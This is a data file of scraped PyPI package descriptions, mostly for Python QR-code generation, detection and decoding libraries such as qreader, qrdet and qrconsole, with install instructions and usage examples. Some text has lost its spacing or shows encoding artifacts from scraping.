-n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2584\u2584\u2584\u2584\u2584 \u2588\u2588\u2584 \u2580 \u2588 \u2584\u2584\u2584\u2584\u2584 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588 \u2584 \u2588\u2580\u2588 \u2588 \u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2584\u2584\u2584\u2588 \u2588 \u2584\u2584 \u2588 \u2588\u2584\u2584\u2584\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588 \u2580\u2584\u2580 \u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2580\u2584 \u2588 \u2588\u2584\u2584 \u2584\u2584\u2580\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584 \u2580 \u2580\u2584\u2580\u2588 \u2584\u2584\u2588\u2584\u2584 \u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2588 \u2588 \u2580\u2580\u2580 \u2580\u2580\u2580\u2584 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2584\u2584\u2584\u2584\u2584 \u2588\u2580\u2584\u2584\u2580 \u2580 \u2584\u2588\u2580 \u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588 \u2580\u2588\u2588 
\u2588\u2588 \u2580\u2588\u2580\u2588\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2584\u2584\u2584\u2588 \u2588\u2584\u2584\u2584\u2584\u2588\u2584\u2588\u2580\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2584\u2588\u2588\u2584\u2588\u2584\u2588\u2588\u2588\u2584\u2588\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\nmydata 3APIExamples:from qrcode_term import qrcode_string\n\na = qrcode_string(\"Is there anybody out there?\")\nb = qrcode_string(\"It's just another brick in the wall\", frame_width=1)\nc = qrcode_string(\"Vera! Vera!\", version=5, inverse=True, frame_width=5, ansi_white=False)\n\nprint(a)\nprint(b)\nprint(c)"} +{"package": "qrcode_terminal", "pacakge-description": "No description available on PyPI."} +{"package": "qrcodetools", "pacakge-description": "-test"} +{"package": "qrcodeutil", "pacakge-description": "QR Code Decoder Python LibraryTheQR Code Decoder Python Libraryis a pure Python implementation of QR code decoding.The few existing Python implementations, such asqrtools, actually depends on other libraries (e.g.,Zbar), which your grandmother won't be able to install the same way on Windows, Mac, and Linux, in just one click, for sure. And you should consider most of the users, and even your pairs, like your grandmother.This Python library is not intended to be used for real-time QR code decoding. 
It takes a few seconds per image."} +{"package": "qrcode-utils", "pacakge-description": "qrcode_utils: This package lets you generate a QR CODE as a .png image from a string provided by the user, and also decode the generated code back from a provided image file.Installation:pip install qrcode_utilsUsage instructions:First, install the required libraries and import the Qr class from the QrUtilitario.Qr module.\nNext, define a word (a string of up to 4296 characters) as input, which will be turned into a QR CODE.\nFor decoding, the input is a QR CODE image file, which will be read and decoded back into a string.Library requirements:The main libraries that must be installed for the package to run correctly are opencv-python, qrcode and numpy.Test file:The test file teste.py (main.py) should be configured as follows:from QrUtilitario.Qr import Qr\n\npalavra = \"Suco de cevadiss, \u00e9 um leite divinis, qui tem lupuliz, matis, aguis e fermentis\"\n\ndado = Qr.gerar_qr(palavra)\n\nQr.ler_imagem(\"meu_qr_code.png\")"} +{"package": "qrcode-xcolor", "pacakge-description": "QRCode XColorNote: This does not work with the qrcode version 7.3.1 on PyPI. PyPI will not allow git sources in the setup.py requirements, so it must be installed manually.Install qrcode from master branchpipinstallgit+https://github.com/lincolnloop/python-qrcode.git@8a37658d68dae463479ee88e96ee3f1f53a16f54This library recreates a few of themoduledrawersclasses already found inhttps://github.com/lincolnloop/python-qrcode.This was done to greatly speed up the generation of creating colored qrcodes, as well as supporting for different colors and styles for the location marker in the corners.Using these custom classes you do lose support for the full features of thecolor_maskargument in the originalQRCodelibrary like having the colors be a gradient across the qrcode.I chose for speed over having that feature with still getting full color and transparency support of the qrcode.All supported module drawers:fromqrcode_xcolorimport(XStyledPilImage,XSquareModuleDrawer,XGappedSquareModuleDrawer,XCircleModuleDrawer,XRoundedModuleDrawer,XVerticalBarsDrawer,XHorizontalBarsDrawer)Here are some examples of the speed difference:importtimeimportqrcodefromqrcode.image.styledpilimportStyledPilImagefromqrcode.image.styles.moduledrawersimportGappedSquareModuleDrawer,RoundedModuleDrawerfromqrcode.image.styles.colormasksimportSolidFillColorMaskfromqrcode_xcolorimportXStyledPilImage,XGappedSquareModuleDrawer,XRoundedModuleDrawerst=time.time()qr=qrcode.QRCode()qr.add_data(\"https://example.com\")img=qr.make_image(image_factory=StyledPilImage,color_mask=SolidFillColorMask(front_color=(59,89,152),back_color=(255,255,255),),module_drawer=GappedSquareModuleDrawer(),eye_drawer=RoundedModuleDrawer(),embeded_image_path='docs/gitlab.png',)img.save(\"qrcode_color_mask.png\")print(f\"qrcode color_mask:{time.time()-st:.4f}s\")st=time.time()qr=qrcode.QRCode()qr.add_data(\"https://example.com\")# The 4th value in all the colors is the opacity the color should use (0=clear <--> 255=solid)img=qr.make_image(# Custom image factoryimage_factory=XStyledPilImage,back_color=(255,255,255,255),# Background color with opacity supportmodule_drawer=XGappedSquareModuleDrawer(front_color=(59,89,152,255),),eye_drawer=XRoundedModuleDrawer(front_color=(255,110,0,255),inner_eye_color=(65,14,158,255),# Only valid with the
eye_drawer),embeded_image_path='docs/gitlab.png',# Still supports embedding logos in the middle)img.save(\"qrcode-xcolor.png\")print(f\"qrcode-xcolor:{time.time()-st:.4f}s\")From this test we get the results (exact timings will vary but the difference is always there):qrcode color_mask: 0.5071sqrcode-xcolor: 0.0430s"} +{"package": "qrconfig", "pacakge-description": "qrconfigCan access dictionary items both as dictionary (like config['field']) and as an attribute (config.field),\nrecursively: config.field.subfield.subsubfield...\nAlso supports item assignment to update the configuration in runtime.Usage example:fromqrconfigimportQRYamlConfigconfig=QRYamlConfig('config.yaml')a=config.ab=config['b']config.a=4"} +{"package": "qrconsole", "pacakge-description": "QRConsoleA library to display QR codes in console.RequirementsPillow>=7.0.0- Download usingpythonorpython3 -m pip install \"Pillow>=7.0.0\"InstallationPyPITo get the module through PyPi:pip install qrconsole.GitHub (Pulled Repo)To install the module by pulling the repo:python setup.py install.How to useQRConsole is pretty straight-forward. Provide an image, and it will return a string with the console-ified version.The image provided must be black-and-white. If there are greys, they will be turned into white or black depending on which they are closer to.A good site for creation isthis one, since there is no rounding or styling, just b&w pixels.It is recommended to keep the images as small as possible, since every pixel of the image is two characters in the console. The example image is 65x65 px.UseIn a projectInitializefromqrconsoleimportQRConsoleqr=QRConsole(char=\"@\")# char = The character to use for white in the QR Code. Must have a length of 1.Console-ify imageThere are two ways to do this. The first way is to provide a path to the image:print(qr.consoleify(qr_img=\"path_to_code.png\",resize_factor=1))# `qr_img: str` - The path to the QR Code image.# `resize_factor: float` - How much to shrink/grow the image by (`width/resize_factor`, `height/resize_factor`)And the second way is to provide a Pillow Image object:fromPILimportImageimg=Image.open(\"path_to_code.png\")print(qr.consoleify(qr_img=img,resize_factor=1))# `qr_img: Image` - A Pillow Image object.# `resize_factor: float` - How much to shrink/grow the image by (`width/resize_factor`, `height/resize_factor`)Some libraries (for example theqrcodelibrary) can turn codes into Images natively, so this method would be easier to use to avoid unnecessary file-writing.Throughpython -mIt is also possible to use QRConsole as a command line tool. 
After installing the package, runpythonorpython3 -m qrconsole ."} +{"package": "qr-console", "pacakge-description": "qr_consoleThis project is a small console-app builder based onargparsepackage.Usage example:fromqr_consoleimportQRConsole,QRCommandconsole=QRConsole(hello='hello')console.add_command(QRCommand('add',lambdaa,b:print(a+b),'sum 2 integers').add_argument('a',type=int,help='1st arg').add_argument('b',type=int,help='2nd arg'))console.add_command(QRCommand('sub',lambdaa,b:print(a-b),'differ 2 integers').add_argument('-a',type=int,default=0,help='1st arg').add_argument('--value','-v',type=int,help='2nd arg'))console.add_command(QRCommand('one',lambdav,i:print(v+1ifielsev-1),'change value by 1').add_argument('v',type=int).add_argument('-i','--flag',action='store_true',help='set to inc; default is dec'))console.run()Output example:hello\nType'-h'or'--help'togetmoreinfo\nEntercommands:\n?>-h\nusage:PROG[-h]{add,sub,one}...\n\npositionalarguments:{add,sub,one}addsum2integerssubdiffer2integersonechangevalueby1optionalarguments:-h,--helpshowthishelpmessageandexit?>add-h\nusage:add[-h]ab\n\npositionalarguments:a1stargb2ndarg\n\noptionalarguments:-h,--helpshowthishelpmessageandexit?>one--help\nusage:one[-h][-i]v\n\npositionalarguments:v\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-i,--i,--flagsettoinc;defaultisdec\n?>add123?>sub-a=5-v=23?>sub--value=5-5\n?>one54?>one-i56?>add\nthefollowingargumentsarerequired:a,b\n?>sub-b=5unrecognizedarguments:-b=5?>add1a\nargumentb:invalidintvalue:'a'?>"} +{"package": "qrc-pathlib", "pacakge-description": "qrc_pathlibQt Resource Systemallows to store files\ninside binaries and read them by using Qt\u2019s file system abstraction (QFile, QDir etc).This package extendspathlibintroduced in Python 3.4\nby implementingPathandPurePathfor QRS:fromqrc_pathlibimportQrcPathQrcPath(':my_resource.svg').read_bytes()withQrcPath(':hello.txt').open()asf:print(f.read())Since QRS is read-only all methods that are supposed to modify files raisePermissionError. Other inapplicable methods\nsuch asstatwill raiseNotImplementedError."} +{"package": "qrdecode", "pacakge-description": "decode QRCode data"} +{"package": "qrdecoder", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrdecodexy", "pacakge-description": "Get constellation Info From juhe API"} +{"package": "qrdet", "pacakge-description": "QRDetQRDetis a robustQR Detectorbased onYOLOv8.QRDetwill detect & segmentQRcodes even indifficultpositions ortrickyimages. 
If you are looking for a completeQR Detection+Decodingpipeline, take a look atQReader.InstallationTo installQRDet, simply run:pipinstallqrdetUsageThere is only one function you'll need to call to useQRDet,detect:fromqrdetimportQRDetectorimportcv2detector=QRDetector(model_size='s')image=cv2.imread(filename='resources/qreader_test_image.jpeg')detections=detector.detect(image=image,is_bgr=True)# Draw the detectionsfordetectionindetections:x1,y1,x2,y2=detections['bbox_xyxy']confidence=detections['confidence']segmenation_xy=detections['quadrilateral_xy']cv2.rectangle(image,(x1,y1),(x2,y2),color=(0,255,0),thickness=2)cv2.putText(image,f'{confidence:.2f}',(x1,y1-10),fontFace=cv2.FONT_HERSHEY_SIMPLEX,fontScale=1,color=(0,255,0),thickness=2)# Save the resultscv2.imwrite(filename='resources/qreader_test_image_detections.jpeg',img=image)API ReferenceQReader.detect(image, is_bgr = False, **kwargs)image:np.ndarray|'PIL.Image'|'torch.Tensor'|str.np.ndarrayof shape(H, W, 3),PIL.Image,Tensorof shape(1, 3, H, W), orpath/urlto the image to predict.'screen'for grabbing a screenshot.is_bgr:bool. IfTruethe image is expected to be inBGR. Otherwise, it will be expected to beRGB. Only used when image isnp.ndarrayortorch.tensor. Default:Falselegacy:bool. If sent askwarg, will parse the output to make it identical to 1.x versions. Not Recommended. Default: False.Returns:tuple[dict[str, np.ndarray|float|tuple[float|int, float|int]]]. A tuple of dictionaries containing all the information of every detection. Contains the following keys.KeyValue Desc.Value TypeValue FormconfidenceDetection confidencefloatconf.bbox_xyxyBounding boxnp.ndarray (4)[x1, y1, x2, y2]cxcyCenter of bounding boxtuple[float,float](x, y)whBounding box width and heighttuple[float,float](w, h)polygon_xyPrecise polygon that segments theQRnp.ndarray (N,2)[[x1, y1], [x2, y2], ...]quad_xyFour corners polygon that segments theQRnp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]padded_quad_xyquad_xypadded to fully coverpolygon_xynp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]image_shapeShape of the input imagetuple[float,float](h, w)NOTE:Allnp.ndarrayvalues are of typenp.float32All keys (exceptconfidenceandimage_shape) have a normalized ('n') version. For example,bbox_xyxyrepresents the bbox of the QR in image coordinates [[0., im_w], [0., im_h]], whilebbox_xyxyncontains the same bounding box in normalized coordinates [0., 1.].bbox_xyxy[n]andpolygon_xy[n]are clipped toimage_shape. You can use them for indexing without further managementAcknowledgementsThis library is based on the following projects:YoloV8model forObject Segmentation.QuadrilateralFitterfor fitting 4 corners polygons from noisysegmentation outputs."} +{"package": "qrDocumentIndexer", "pacakge-description": "qrDocumentIndexerA python library for tagging PDF documents with QR codes so that they can be rebuilt into the same document structure after being printed and scanned back.PurposeThis library is intended to be used where documents may be printed and then subsequently scanned back to digital format. Normally\nthis process would result in the loss of any format structure. The documents may even be scanned back in different orders. 
This\ncan be particularly common in the cases where documents being printed are technical drawings and they may be re-ordered for\nreview or other purposes before being scanned again.This library is intended to store the following information about each page of a PDF in a QR code:FilenamePage numberBookmarks (including nesting)This information can then be used to restructure the documents after scanning. This should even be possible if documents\nare scanned into multiple PDFs or image files.Additional metadata that could be included in future could include:PagesizesPaper orientationCurrent StateThe tool in it's current state should be fully functional. It can:Insert QR codes into each page of provided PDFs to allow later sorting;Scan PDFs or image files for QR codes to determine their appropriate order in a document;Reconstitute PDF files based on the order dictated by detected QR codes, recreating the original filenames and orders of the documents.What is missing:There is currently no progress indication. It will finish when it finishes;Currently the QR scanning process is single threaded so it may take some time to complete;There is no preview for the documents so you will have to run the tool for everything to see what you get.How to installInstall with the following command:pip install qrDocumentIndexerZBarThis package relies on the ZBar library. Please see the below guides for ensuring this library is properly installed:OnWindows:No installation is required as it is packaged with the python libraries, but it does have dependancies which if not present can cause errors:If you see an ugly ImportError related withlizbar-64.dll, install thevcredist_x64.exefrom theVisual C++ Redistributable Packages for Visual Studio 2013OnLinux:sudoapt-getinstalllibzbar0OnMac OS X:brewinstallzbar"} +{"package": "qre", "pacakge-description": "qre - like re, but cuterSamplesPattern\"* pattern\"Input\"First pattern\"Result\ud83d\udc4d\ud83c\udffcPattern\"World's [] pattern\"Input\"World's coolest pattern\"Result[\"coolest\"]Pattern\"product id: [product_id], units: [units: int], price: [unit_price: decimal]\"Input\"Product ID: A123, Units: 3, Price: 1.23\"(case-insensitive)Result{\"product_id\": \"A123\", \"units\": 3, \"unit_price\": Decimal(\"1.23\")}This package owes everything, including most of the codebase, to Thomas Feldtmann'ssimplematch. All poor design decisions are mine.\nSeethis collectionfor other alternatives.Status: Comprehensively tested but never used for anything real. All evolution is expected to be\nincremental.Quick startpip install qreMy first little match:importqreassertqre.search(\"in [place]\",\"Match made in heaven\")=={\"place\":\"heaven\"}qreis mostly focused on collecting named groups from the input strings, so the return value is\nan easy-to-access dict. Groups are denoted with brackets, which means that patterns are friendly\nwith f-strings.For unnamed groups the returned object has been tweaked a little bit - they can be found as a list\nin theunnamedattribute:assertqre.match(\"[] [:int]\",\"Lesson 1\").unnamed==[\"Lesson\",1]Type specifiers can be used with both named and unnamed groups. 
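For instance, building directly on the samples above, a small sketch of how the int and decimal specifiers behave (the patterns themselves are ad-hoc illustrations, not taken from the original docs):
import qre
from decimal import Decimal

# A type specifier both narrows what the group matches and converts the captured text
assert qre.match('Lesson [n: int]', 'Lesson 7') == {'n': 7}
assert qre.search('total: [total: decimal]', 'total: 1.99') == {'total': Decimal('1.99')}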
They act both as specs for the\npattern to find and, when applicable, as converters to the right type.Currently available types are:intfloatdecimaldate(ISO)datetime(ISO)uuidlettersidentifier(lettersplus numbers and underscore)emailurlipv4ipv6creditcardopen(any one of(,[,{)close(),], or})You can register your own types and conversions withregister_type(name, regex, converter=str).\nAsqre's goal is not to replicate the functionality of re, this can also act as the \"escape hatch\"\nwhen you need just a little bit more than whatqreoffers.Here's how to useregister_typeto turn an emoji into a textual description:qre.register_type(\"mood\",r\"[\ud83d\ude00\ud83d\ude1e]\",lambdaemoji:{\"\ud83d\ude00\":\"good\",\"\ud83d\ude1e\":\"bad\"}.get(emoji,\"unknown\"))assertqre.search(\"[mood:mood]\",\"I'm feeling \ud83d\ude00 today!\")=={\"mood\":\"good\"}Note thatregister_typemanipulates a global object, so you only need to register custom types\nonce, probably somewhere towards the start of your program.PRs for generally useful types are highly welcome.Matching functionsMatching functions expect apatternand astringto match against. The optionalcase_sensitiveargument is true by default.match- Matchpatternagainst the whole of thestringmatch_start- Matchpatternagainst the beginning of thestringmatch_end- Matchpatternagainst the end of thestringsearch- Return the first match of thepatternin thestringsearch_all- Return all matches of thepatternin thestringas a listAll of the functions always return an object that is either truthy or falsy depending on whether\nthere was a match or not. They never returnNone, and theunnamedattribute contains at least an\nempty list, so the returned object is always safe to iterate.Alternatively, you can use the Matcher object. It has the following useful attributes:regexfor debugging the generated regex, or for copying it for use with plainreconvertersfor debugging the converters in usematcher=qre.Matcher(\"value: [quantitative:float]|[qualitative]\",case_sensitive=False)assertmatcher.match(\"Value: 1.0\")=={\"quantitative\":1.0}# Or any of the other functions aboveassertmatcher.regex==\"value:\\\\(?P[+-]?(?:[0-9]*[.])?[0-9]+)|(?P.*)\"assertmatcher.converters=={'quantitative':float}As a final usage scenario, you can callqreon the command line:$ python qre.py\nusage: qre.py [-h] [--regex] pattern stringPattern syntax summaryWildcards:*- any character 0+ times+- any 1 character?- any 1 character, maybeOperators:|- either of two characters or groupsGroups:[name]- named group called \"name\", returned in the main dict.[]- unnamed group, returned in theunnamedlist[name:4],[:4]- group that is 4 characters wide[name:int],[:int]- group that matches the type and is converted to that Python typeEscaping:[*],[+],[?],[|]- literal symbol, not wildcard[[,]]- literal brackets, not groups"} +{"package": "qreader", "pacakge-description": "QReaderQReaderis aRobustandStraight-Forwardsolution for readingdifficultandtrickyQRcodes within images inPython. Powered by aYOLOv8model.Behind the scenes, the library is composed by two main building blocks: AYOLOv8QR Detectormodel trained todetectandsegmentQR codes (also offered asstand-alone), and thePyzbarQR Decoder. 
Using the information extracted from thisQR Detector,QReadertransparently applies, on top ofPyzbar, different image preprocessing techniques that maximize thedecodingrate on difficult images.InstallationTo installQReader, simply run:pipinstallqreaderYou may need to install some additionalpyzbardependencies:OnWindows:Rarely, you can see an ugly ImportError related withlizbar-64.dll. If it happens, install thevcredist_x64.exefrom theVisual C++ Redistributable Packages for Visual Studio 2013OnLinux:sudoapt-getinstalllibzbar0OnMac OS X:brewinstallzbarNOTE:If you're runningQReaderin a server with very limited resources, you may want to install theCPUversion ofPyTorch, before installingQReader. To do so, run:pip install torch --no-cache-dir(Thanks to@cjwaltherfor his advice).UsageQReaderis a very simple and straight-forward library. For most use cases, you'll only need to calldetect_and_decode:fromqreaderimportQReaderimportcv2# Create a QReader instanceqreader=QReader()# Get the image that contains the QR codeimage=cv2.cvtColor(cv2.imread(\"path/to/image.png\"),cv2.COLOR_BGR2RGB)# Use the detect_and_decode function to get the decoded QR datadecoded_text=qreader.detect_and_decode(image=image)detect_and_decodewill return atuplecontaining the decodedstringof everyQRfound in the image.NOTE: Some entries can beNone, it will happen when aQRhave been detected butcouldn't be decoded.API ReferenceQReader(model_size = 's', min_confidence = 0.5, reencode_to = 'shift-jis')This is the main class of the library. Please, try to instantiate it just once to avoid loading the model every time you need to detect aQRcode.model_size:str. The size of the model to use. It can be'n'(nano),'s'(small),'m'(medium) or'l'(large). Larger models are more accurate but slower. Default: 's'.min_confidence:float. The minimum confidence of the QR detection to be considered valid. Values closer to 0.0 can get moreFalse Positives, while values closer to 1.0 can lose difficult QRs. Default (and recommended): 0.5.reencode_to:str|None. The encoding to reencode theutf-8decoded QR string. If None, it won't re-encode. If you find some characters being decoded incorrectly, try to set aCode Pagethat matches your specific charset. Recommendations that have been found useful:'shift-jis' for Germanic languages'cp65001' for Asian languages (Thanks to @nguyen-viet-hung for the suggestion)QReader.detect_and_decode(image, return_detections = False)This method will decode theQRcodes in the given image and return the decodedstrings(orNone, if any of them was detected but not decoded).image:np.ndarray. The image to be read. It is expected to beRGBorBGR(uint8). Format (HxWx3).return_detections:bool. IfTrue, it will return the full detection results together with the decoded QRs. If False, it will return only the decoded content of the QR codes.is_bgr:boolean. IfTrue, the received image is expected to beBGRinstead ofRGB.Returns:tuple[str | None] | tuple[tuple[dict[str, np.ndarray | float | tuple[float | int, float | int]]], str | None]]: A tuple with all detectedQRcodes decodified. Ifreturn_detectionsisFalse, the output will look like:('Decoded QR 1', 'Decoded QR 2', None, 'Decoded QR 4', ...). Ifreturn_detectionsisTrueit will look like:(('Decoded QR 1', {'bbox_xyxy': (x1_1, y1_1, x2_1, y2_1), 'confidence': conf_1}), ('Decoded QR 2', {'bbox_xyxy': (x1_2, y1_2, x2_2, y2_2), 'confidence': conf_2, ...}), ...). 
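Tying the pieces above together, a minimal sketch of iterating over the decoded strings and their detection metadata (the image path is a placeholder):
from qreader import QReader
import cv2

qreader = QReader(model_size='s')
# QReader expects RGB by default, so convert the BGR array loaded by OpenCV
image = cv2.cvtColor(cv2.imread('path/to/image.png'), cv2.COLOR_BGR2RGB)

# return_detections=True pairs each decoded string (or None) with its detection dict
for decoded_text, detection in qreader.detect_and_decode(image=image, return_detections=True):
    if decoded_text is None:
        print('QR detected but not decoded, confidence:', detection['confidence'])
    else:
        print(decoded_text, detection['bbox_xyxy'])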
LookQReader.detect()for more information about detections format.QReader.detect(image)This method detects theQRcodes in the image and returns atuple of dictionarieswith all the detection information.image:np.ndarray. The image to be read. It is expected to beRGBorBGR(uint8). Format (HxWx3).is_bgr:boolean. IfTrue, the received image is expected to beBGRinstead ofRGB.Returns:tuple[dict[str, np.ndarray|float|tuple[float|int, float|int]]]. A tuple of dictionaries containing all the information of every detection. Contains the following keys.KeyValue Desc.Value TypeValue FormconfidenceDetection confidencefloatconf.bbox_xyxyBounding boxnp.ndarray (4)[x1, y1, x2, y2]cxcyCenter of bounding boxtuple[float,float](x, y)whBounding box width and heighttuple[float,float](w, h)polygon_xyPrecise polygon that segments theQRnp.ndarray (N,2)[[x1, y1], [x2, y2], ...]quad_xyFour corners polygon that segments theQRnp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]padded_quad_xyquad_xypadded to fully coverpolygon_xynp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]image_shapeShape of the input imagetuple[int,int](h, w)NOTE:Allnp.ndarrayvalues are of typenp.float32All keys (exceptconfidenceandimage_shape) have a normalized ('n') version. For example,bbox_xyxyrepresents the bbox of the QR in image coordinates [[0., im_w], [0., im_h]], whilebbox_xyxyncontains the same bounding box in normalized coordinates [0., 1.].bbox_xyxy[n]andpolygon_xy[n]are clipped toimage_shape. You can use them for indexing without further managementNOTE: Is this the only method you will need? Take a look atQRDet.QReader.decode(image, detection_result)This method decodes a singleQRcode on the given image, described by a detection result.Internally, this method will run thepyzbardecoder, using the information of thedetection_result, to apply different image preprocessing techniques that heavily increase the detecoding rate.image:np.ndarray. NumPy Array with theimagethat contains theQRto decode. The image is expected to be inuint8format [HxWxC], RGB.detection_result: dict[str, np.ndarray|float|tuple[float|int, float|int]]. One of thedetection dictsreturned by thedetectmethod. Note thatQReader.detect()returns atupleof thesedict. This method expects just one of them.Returns:str | None. The decoded content of theQRcode orNoneif it couldn't be read.Usage TestsTwo sample images. At left, an image taken with a mobile phone. At right, a 64x64QRpasted over a drawing.The following code will try to decode these images containingQRs withQReader,pyzbarandOpenCV.fromqreaderimportQReaderfromcv2importQRCodeDetector,imreadfrompyzbar.pyzbarimportdecode# Initialize the three tested readers (QRReader, OpenCV and pyzbar)qreader_reader,cv2_reader,pyzbar_reader=QReader(),QRCodeDetector(),decodeforimg_pathin('test_mobile.jpeg','test_draw_64x64.jpeg'):# Read the imageimg=imread(img_path)# Try to decode the QR code with the three readersqreader_out=qreader_reader.detect_and_decode(image=img)cv2_out=cv2_reader.detectAndDecode(img=img)[0]pyzbar_out=pyzbar_reader(image=img)# Read the content of the pyzbar output (double decoding will save you from a lot of wrongly decoded characters)pyzbar_out=tuple(out.data.data.decode('utf-8').encode('shift-jis').decode('utf-8')foroutinpyzbar_out)# Print the resultsprint(f\"Image:{img_path}-> QReader:{qreader_out}. OpenCV:{cv2_out}. pyzbar:{pyzbar_out}.\")The output of the previous code is:Image: test_mobile.jpeg -> QReader: ('https://github.com/Eric-Canas/QReader'). OpenCV: . 
pyzbar: ().\nImage: test_draw_64x64.jpeg -> QReader: ('https://github.com/Eric-Canas/QReader'). OpenCV: . pyzbar: ().Note thatQReaderinternally usespyzbarasdecoder. The improveddetection-decoding ratethatQReaderachieves comes from the combination of different image pre-processing techniques and theYOLOv8basedQRdetectorthat is able to detectQRcodes in harder conditions than classicalComputer Visionmethods.BenchmarkRotation TestMethodMax Rotation DegreesPyzbar17\u00c2\u00baOpenCV46\u00c2\u00baQReader79\u00c2\u00ba"} +{"package": "qreative", "pacakge-description": "No description available on PyPI."} +{"package": "qredis", "pacakge-description": "QRedisAPython,QtbasedRedisclient user interface.Help wantedOpen to people who want to colaborate.Would like to know which features you would like to havePull requests are welcomeYou can always open an issue saying you want to be part of the teamInstallation$pipinstallqredisRequirementsPython >= 3.5PyQt5\n(or in the future 